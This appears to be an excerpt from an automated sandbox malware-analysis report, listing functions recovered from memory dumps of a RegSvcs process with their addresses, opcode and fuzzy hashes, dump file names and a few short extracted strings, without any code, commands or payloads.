Opcode ID: 6f9d59e349250d37877e961ea3214ffb5f969069eec485dd015b7d0a42a6d7be
Instruction ID: 8d8cbb8d2c246754d9215fb9748979925a373475a7906abfa6b1c59b697e5f67
Opcode Fuzzy Hash: 6f9d59e349250d37877e961ea3214ffb5f969069eec485dd015b7d0a42a6d7be
Instruction Fuzzy Hash: CC51AC34A09101DBDB148B69DD98BBFB7B2EB88305F60C56BD50F9B284D7349882DB52

Uniqueness

Uniqueness Score: -1.00%

Function 067769E8 Relevance: 1.4, Strings: 1, Instructions: 154COMMON

Download Yara Rule

Strings

JXr, xrefs: 06776F11

Memory Dump Source

Source File: 00000005.00000002.3310174991.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6770000_RegSvcs.jbxd

Similarity

API ID:
String ID: JXr
API String ID: 0-3088851973
Opcode ID: 51b74bf62877e46ea31b4403174a622cbc5d13768ead5fcd13b8fa0dc77080f4
Instruction ID: ed28e1b08f173d13294ef5322f060f0ff0405ac11141e0a66ba8f3b5328967e8
Opcode Fuzzy Hash: 51b74bf62877e46ea31b4403174a622cbc5d13768ead5fcd13b8fa0dc77080f4
Instruction Fuzzy Hash: B651BF30A04A14CFEF84DF58C464B797BB3EB46305F19C16AE0169B29DD774E985CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00A74C0C Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

XYr, xrefs: 00A75092

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID: XYr
API String ID: 0-3412241957
Opcode ID: b4b6d5e12054ea6a9ae13c5e35ab1f2feaebbb1ada231792a30773cff832959f
Instruction ID: 604ca5c862380f052ad4fa45296ded1a0d0571d6d6db9bff4cab1324a3b434ab
Opcode Fuzzy Hash: b4b6d5e12054ea6a9ae13c5e35ab1f2feaebbb1ada231792a30773cff832959f
Instruction Fuzzy Hash: 5D31CE2054FFC81FD30387709E26A55BFB9BF42204F59C4FED9854A8A3C194459BC752

Uniqueness

Uniqueness Score: -1.00%

Function 06771AEE Relevance: 1.4, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

$]q, xrefs: 06771B55

Memory Dump Source

Source File: 00000005.00000002.3310174991.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6770000_RegSvcs.jbxd

Similarity

API ID:
String ID: $]q
API String ID: 0-1007455737
Opcode ID: 29dcea2783abedaea6caeb9b414bcf468dbca21d71b0401940c4406f6d3c60c6
Instruction ID: 4c58c97a061d2edf933bff920a53cf1001428d41e85eac1fc32a317c7d17fb87
Opcode Fuzzy Hash: 29dcea2783abedaea6caeb9b414bcf468dbca21d71b0401940c4406f6d3c60c6
Instruction Fuzzy Hash: 1541C430E04115CFEF948FA5C4107BAB7B2FB85316F9DC276D0529B299E2349885CB91

Uniqueness

Uniqueness Score: -1.00%

Function 067A2E86 Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

.5uq, xrefs: 067A2E89

Memory Dump Source

Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: .5uq
API String ID: 0-910421107
Opcode ID: f27f9038b828566d7ea1faf85bdf4b6bb46f15e9be6358c134c1bb4a1a454393
Instruction ID: ee2aded344288b90c20e28dac9c9d5bbdb6d9dc51eb30333e0b4545ff63c077c
Opcode Fuzzy Hash: f27f9038b828566d7ea1faf85bdf4b6bb46f15e9be6358c134c1bb4a1a454393
Instruction Fuzzy Hash: 72114C70E04218CFEB61CB65CA54BEDBBF6AB88301F1081A9E54DA7256DB759E80CF50

Uniqueness

Uniqueness Score: -1.00%

Function 067A3003 Relevance: 1.3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

Strings

.5uq, xrefs: 067A3006

Memory Dump Source

Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: .5uq
API String ID: 0-910421107
Opcode ID: 83449ad3cd323fafe0744ab61bc6cba12cd59818b2e76b68a3f100d224d1273b
Instruction ID: 6093142b1a11576f475783073305e8573bd9ef253354555365f19f90d87c6556
Opcode Fuzzy Hash: 83449ad3cd323fafe0744ab61bc6cba12cd59818b2e76b68a3f100d224d1273b
Instruction Fuzzy Hash: 9A113A70A04218CFDB60CB64CE54BEDBBB6EB84301F1081A5E549AB255D7759E80CF51

Uniqueness

Uniqueness Score: -1.00%

Function 067A2F83 Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

.5uq, xrefs: 067A2F86

Memory Dump Source

Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: .5uq
API String ID: 0-910421107
Opcode ID: 9c7af00626b61170f2994e9e60ecf7e81e5a21876340c26de76344e90445642c
Instruction ID: 2c49c1d7eb65085a830f607cb4ccccec766dc582936a4f3fbc07c2e16b187e9b
Opcode Fuzzy Hash: 9c7af00626b61170f2994e9e60ecf7e81e5a21876340c26de76344e90445642c
Instruction Fuzzy Hash: 48112A70E04218CFEB60CB64CD54BEDBBB5FB88301F2081A9E559AB296C7759E80CF51

Uniqueness

Uniqueness Score: -1.00%

Function 06795F8E Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

$]q, xrefs: 06795FA0

Memory Dump Source

Source File: 00000005.00000002.3310908949.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6790000_RegSvcs.jbxd

Similarity

API ID:
String ID: $]q
API String ID: 0-1007455737
Opcode ID: dc0aa11805446dd9534c5275c8f4a8d398172ab81863d97ef21873e1afb9eb55
Instruction ID: 608a511e7a7d194161fd01ac373b13a11a287879da02f87cfd15335728732515
Opcode Fuzzy Hash: dc0aa11805446dd9534c5275c8f4a8d398172ab81863d97ef21873e1afb9eb55
Instruction Fuzzy Hash: 21F0C974E5112ADFFB69CA64C944BACB3F2FB04310F1084A9E809A7242C774AD81CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A75106 Relevance: 1.3, Strings: 1, Instructions: 10COMMON

Download Yara Rule

Strings

^Yr, xrefs: 00A7510E

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID: ^Yr
API String ID: 0-490425656
Opcode ID: 7d6e0047fc653d72e00981134f2c731c4decd158eb38ddb59ff5f9fa5090ec63
Instruction ID: fb3b964753c7ded3e5a8fc27fc8fd3932fda61348d24aa2c011b38c6034ac5bd
Opcode Fuzzy Hash: 7d6e0047fc653d72e00981134f2c731c4decd158eb38ddb59ff5f9fa5090ec63
Instruction Fuzzy Hash: FAC080301445478FE3169774E819AD177B5FF84324B15C7B5405D0A469DB794847CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0677011E Relevance: .4, Instructions: 350COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3310174991.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6770000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa79355f8341a952bae8b6123326fdd31d59aa3563c26e728cb09db13de3195f
Instruction ID: 69e84556395a2caa1fdca83620881ea08f5d77fb2f555b21b38af38725b8bd57
Opcode Fuzzy Hash: fa79355f8341a952bae8b6123326fdd31d59aa3563c26e728cb09db13de3195f
Instruction Fuzzy Hash: 53B10271E042C6ABFFF18B61C840ABDFBA2EB52FF1BEDC159D0415A541D33499028B99

Uniqueness

Uniqueness Score: -1.00%

Function 067AFA58 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cb0c084d040b67489507e88ec0080bdc2e8b70597db32e4392dc2bb5ce1cb72
Instruction ID: 7876a30fc531622bb5a45774a20cac843181bcf68dfd4a23544e1cd31d385893
Opcode Fuzzy Hash: 0cb0c084d040b67489507e88ec0080bdc2e8b70597db32e4392dc2bb5ce1cb72
Instruction Fuzzy Hash: 0AD14034A11314DFCB95DF69D994AADB7B2FF88311F108269E506AB3A1CB39DC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 068A0080 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3313747501.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_68a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bb02caa225e305a9ecbcd9f7aa18f282e96b957b1d1b6b62dd85575d33bc9d0
Instruction ID: 6752755415a574ef4add2e99618b58f574e2c782179bf3d79d1ba0e4f9b146a5
Opcode Fuzzy Hash: 6bb02caa225e305a9ecbcd9f7aa18f282e96b957b1d1b6b62dd85575d33bc9d0
Instruction Fuzzy Hash: 16D1D2389083C55ED7628F78C8245E9FFF0AF47200B289ACDD4E49B252D63055C2EFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A79DA3 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72b699e0a9e68566dec073b4a9c65e4d554229bdfaf8c33f0f416b9dadb902f8
Instruction ID: 052c1fd070e62bd6146306fce6810709551666625c136e70344c7b3f003d3370
Opcode Fuzzy Hash: 72b699e0a9e68566dec073b4a9c65e4d554229bdfaf8c33f0f416b9dadb902f8
Instruction Fuzzy Hash: 07A1BE35909150EFD3118B18CC54BBD7BB2ABA1311F29C5A7D05E9F2A2D3398D82EB53

Uniqueness

Uniqueness Score: -1.00%

Function 067089E9 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307649124.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1db83ccb219cce0d2833c1d9e16951e0d282a9ee7e43fda381d583a3da9235e
Instruction ID: 71907c832def50f097ece2186a5e12b358488b5ccef9ab56313f09bc13e40acb
Opcode Fuzzy Hash: b1db83ccb219cce0d2833c1d9e16951e0d282a9ee7e43fda381d583a3da9235e
Instruction Fuzzy Hash: 7551032151A241FAF7D4CBF09809885F7EAAF87380B0AB099C669BF6F7D620C411C375

Uniqueness

Uniqueness Score: -1.00%

Function 00A79EC2 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7f1a4166131d3a120346e1f0714b282fa54cc2657b0fbd1cfcc82bc36dc2c84
Instruction ID: 3989624c95a9f0f8fe7593efc2865f7522b0a54dd1ed929b6aaaaa403c5e0646
Opcode Fuzzy Hash: b7f1a4166131d3a120346e1f0714b282fa54cc2657b0fbd1cfcc82bc36dc2c84
Instruction Fuzzy Hash: 7C71B235E08111EBE3208B14CC54B7D77B2ABE5311F29C5A7D01E5F292E2398D82AB93

Uniqueness

Uniqueness Score: -1.00%

Function 00A79E3F Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c415857898e79ba0e5db29f16ee3116577bef6c7b9956f20090bca6629b896ba
Instruction ID: 0876abc32931880836be199e280be52668947926d94b8559c9ad11784ec47d22
Opcode Fuzzy Hash: c415857898e79ba0e5db29f16ee3116577bef6c7b9956f20090bca6629b896ba
Instruction Fuzzy Hash: 8271A235D08111EBD7208B14CC54BBD77B2ABE5311F29C5A7D01E5B292E3798D82EB93

Uniqueness

Uniqueness Score: -1.00%

Function 00A79E25 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac21633817ad3c6de64b403ed5b8cd46a217bd27338946d2a4dea43905677555
Instruction ID: fea80c151310755283bdf6f41c14fc1cafc89c3bf921a51055d6a9a05e8eeb3c
Opcode Fuzzy Hash: ac21633817ad3c6de64b403ed5b8cd46a217bd27338946d2a4dea43905677555
Instruction Fuzzy Hash: 6471B135E08111EBE3208B14CC54BBD77B2ABE5311F29C5A7D01E5F292D2798D82AB93

Uniqueness

Uniqueness Score: -1.00%

Function 00A79E1B Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bb9dbf1a39abff851dce93bbb326477029216f97250d62fd02ce82cb402f8d1
Instruction ID: 4967e0c42f9fc7acc6b9ed7008e36d32b1e94d21ab0fd07fbf8bc242be06e2d5
Opcode Fuzzy Hash: 4bb9dbf1a39abff851dce93bbb326477029216f97250d62fd02ce82cb402f8d1
Instruction Fuzzy Hash: A361B135E08111EBE3208B14CC54BBD77B2ABE5311F29C5A7D01E5F292D2398D82AB93

Uniqueness

Uniqueness Score: -1.00%

Function 00A7E248 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2b10209a511c7bbbf4418ecc93c44da07162a0161415357ab1f7af54495e5e7
Instruction ID: 91e3b79caafc61a75eb2e5047dee894ee4fc579cc59d9610256bdad871d29a4e
Opcode Fuzzy Hash: b2b10209a511c7bbbf4418ecc93c44da07162a0161415357ab1f7af54495e5e7
Instruction Fuzzy Hash: 9D717BB1E00249DFDF10DFA9C88179EBBF2BF88304F14C129E419AB254DB759842CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A74B60 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2c392076fcdfbf08edb933fa91e9f1f71d665044c73e03928aafdd656287f5e
Instruction ID: b4bfacae84f1b45d9994909c128924997898a5eef2f213821d2a5358ffaf4bea
Opcode Fuzzy Hash: e2c392076fcdfbf08edb933fa91e9f1f71d665044c73e03928aafdd656287f5e
Instruction Fuzzy Hash: 6741F06094FBC85FD3039B749E666547FB5BF42300F19C4EBC4858B893C694498BC7A2

Uniqueness

Uniqueness Score: -1.00%

Function 06701D9B Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307649124.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7cd8f4db7d31f204520cb7879238e2b92059b139a1bb26f04337214411ac832
Instruction ID: 2601a8f012746df497bc6ac6a518b61b6c3fb3dba06e5fde99161d37412d823f
Opcode Fuzzy Hash: e7cd8f4db7d31f204520cb7879238e2b92059b139a1bb26f04337214411ac832
Instruction Fuzzy Hash: AF419D35B05101CFF7908AA8D440B7EB7E6EB85301FA4C926E506CB6D5EB34D845C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 06779738 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3310174991.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6770000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8fc4c98f4e88d89c42e2edf2064659a7855ee632ff36063bd743ebc583e19ab
Instruction ID: ed8f51dfcbfa4769cf09fd23f8baf15d8040b402d77426dda624a1a24343396b
Opcode Fuzzy Hash: d8fc4c98f4e88d89c42e2edf2064659a7855ee632ff36063bd743ebc583e19ab
Instruction Fuzzy Hash: 0F416F74D0A284CFDB84CFA9C940AADBFF1EB4A255F08C1AAD255DB252D235C940CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 068A4708 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3313747501.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_68a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75657bf3936ad72a8baf7419247f9ba715ae9c8979aab377b4254d61541fc5e4
Instruction ID: 645f6e25cc7df6e604062fa75f39f4d1d681cb7e2214a50507314f8c71749690
Opcode Fuzzy Hash: 75657bf3936ad72a8baf7419247f9ba715ae9c8979aab377b4254d61541fc5e4
Instruction Fuzzy Hash: F651F331D14B1A8ADB50EB68C8446A9F7B1FF99300F11D79AE45C67160FF70AAD4CB81

Uniqueness

Uniqueness Score: -1.00%

Function 068A231C Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3313747501.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_68a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a18322998ca95af1b74fd59dbdfb46c1eeea84066289175e271810ed370c7d3
Instruction ID: 286897cb025f3e174ba51defc6d9f2ef8f72808039de04b7ba52025d3231538e
Opcode Fuzzy Hash: 4a18322998ca95af1b74fd59dbdfb46c1eeea84066289175e271810ed370c7d3
Instruction Fuzzy Hash: 5851E431D14B5A8EDB10EF68C8906D9F7B1FF9A300F10C69AE44D67255EB70AAC5CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00A7E9D0 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1395c2a3a21a6f339db091c92c44ecf24367b38072f6b4ff8d8ed01bc45a3e62
Instruction ID: ae5e4378387358ac70ad9ddb3174a9d440bf02396d54ae5dc906f548222ea648
Opcode Fuzzy Hash: 1395c2a3a21a6f339db091c92c44ecf24367b38072f6b4ff8d8ed01bc45a3e62
Instruction Fuzzy Hash: B341B130A081A5CFC714DB698D446BABFF1BB8D352F19C1E6D45ADB285E338C940DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 068A12EB Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3313747501.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_68a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ae7e3d4ea5b1ce1bf2c2ccd445827fb5cef3ade53833f1b6fa7f312190899f7
Instruction ID: 30cebcedb4966b875c271621f25916e7c2315de7100c4709e935544a167b101a
Opcode Fuzzy Hash: 5ae7e3d4ea5b1ce1bf2c2ccd445827fb5cef3ade53833f1b6fa7f312190899f7
Instruction Fuzzy Hash: AB41A03850A2C59EE7629F28C4646ACFFB0EF46314F6459D8C8E49B253C63059C6EF61

Uniqueness

Uniqueness Score: -1.00%

Function 067A209D Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b75f95c60152632dbbd7c17158b80a4253ba4cd0e81661fc1528b472daec1641
Instruction ID: 9e0695cbedcaa112f94a20848172062947ac53fc0c1b70982e463b31c8f8f28b
Opcode Fuzzy Hash: b75f95c60152632dbbd7c17158b80a4253ba4cd0e81661fc1528b472daec1641
Instruction Fuzzy Hash: 0F419334E05344CFFB649F54C4047BDBBB2EB81300F48C27AE1269B292C77599818F82

Uniqueness

Uniqueness Score: -1.00%

Function 0677192F Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3310174991.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6770000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6786fd73425f19ef49cc33f8fda3102f593ed2681a7ae6c6ace7ec7a9654d67
Instruction ID: d74eddfc98b4ab92ce4f22256e56966cd028d832feb69f0964841f3caf6d272d
Opcode Fuzzy Hash: c6786fd73425f19ef49cc33f8fda3102f593ed2681a7ae6c6ace7ec7a9654d67
Instruction Fuzzy Hash: 0E31D070A04249DFEF40DF64D551AADBBF6EB85300F88C069D145AB281DB345A46CF91

Uniqueness

Uniqueness Score: -1.00%

Function 067032B1 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307649124.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1037608953642759abc23a93d179b2dcc18299ddcc8605250b8652dce92e5a30
Instruction ID: 77b0e5c0b26b4b5ad078bf0cad73a7d45f225d7f9a648a01606c3eaf0b6ef945
Opcode Fuzzy Hash: 1037608953642759abc23a93d179b2dcc18299ddcc8605250b8652dce92e5a30
Instruction Fuzzy Hash: 32319C32A08211CFF390CF18D148B6977F2AB49310F69C4A1D4259B3DAE7349E86CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A7C120 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d94c6cbaf8bce7da1bc45e0a3e806c1ae420a2e03cdbf8ce242dce0fa8b5665
Instruction ID: 6db4fcc3a4ca96085158be26d41b2318103cd2dc86a4313c2f7ab586ef735d5d
Opcode Fuzzy Hash: 3d94c6cbaf8bce7da1bc45e0a3e806c1ae420a2e03cdbf8ce242dce0fa8b5665
Instruction Fuzzy Hash: 5E41DFB0D00249DFDB14DFA9C984ADEBFF5FF48310F648429E80AAB254DB75A945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A71168 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bc45e2f5a48653e1fab3a77d732a22e3c3771704e9b0ab7d35f817025b92fa2
Instruction ID: dbf20e41c8a040f72257b728aca392ec01433c6ad7757d8921705c9256a16b20
Opcode Fuzzy Hash: 7bc45e2f5a48653e1fab3a77d732a22e3c3771704e9b0ab7d35f817025b92fa2
Instruction Fuzzy Hash: 43312630A052099FDB05EBB8E9106FE3BB6EB81300F50C179D50AAB295DF344E878792

Uniqueness

Uniqueness Score: -1.00%

Function 068A3C2B Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3313747501.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_68a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34939ccc60776b31c28e5b3126c91f4bd80011c0f61e565d6c033f55a7745d40
Instruction ID: 8c5464ba82ea0ad09c85e1ec1fd0c13085ba0bcf3d46c5bb77088742c3c48324
Opcode Fuzzy Hash: 34939ccc60776b31c28e5b3126c91f4bd80011c0f61e565d6c033f55a7745d40
Instruction Fuzzy Hash: 3541F931E10B0A8ADB10EB68C9506D9F7B1FF9A300F14C79AE45D67651FB70AAC4CB42

Uniqueness

Uniqueness Score: -1.00%

Function 068A1191 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3313747501.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_68a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcacab485226c6b72c83a81896c3ca69e6e2f7e0e6ac2f2ebf23f9d4b0ac3cb7
Instruction ID: 23d81693a13392577923164b822a1c13840b51c393f31f4d0773eb0855bc519d
Opcode Fuzzy Hash: fcacab485226c6b72c83a81896c3ca69e6e2f7e0e6ac2f2ebf23f9d4b0ac3cb7
Instruction Fuzzy Hash: AC312D30D10B1ACEDB00EBA4C8549AAF7B0FF96300F11D79AE55927560FB70AAC4CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00A1D3EC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3242543338.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a1d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69b1a17e4dcad4de5ac3b398def8799b3d208d44ee410a5370b386a673df7e25
Instruction ID: 857959bd67b5db2e2915d257a9963b6edf9ddb8a89e38b144afc88c72040725d
Opcode Fuzzy Hash: 69b1a17e4dcad4de5ac3b398def8799b3d208d44ee410a5370b386a673df7e25
Instruction Fuzzy Hash: 03213771500204EFDB05DF14D9C0F66BF66FB98320F24C569E9090B256C33AE896D7B1

Uniqueness

Uniqueness Score: -1.00%

Function 00A2D044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3242994972.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a2d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bde236612dd3b710d47b35bdc9c6a8abf3119dabbc21cc463909a704ed21a56
Instruction ID: f73ef475ad5db6aa307751f2614657ba81237dc9bf2e63e976a3d50d8ccc3b0a
Opcode Fuzzy Hash: 5bde236612dd3b710d47b35bdc9c6a8abf3119dabbc21cc463909a704ed21a56
Instruction Fuzzy Hash: 1F210771508204DFDB14CF28E9C4B26BB65FB84314F20C97DE94A4B363C73AD846DA61

Uniqueness

Uniqueness Score: -1.00%

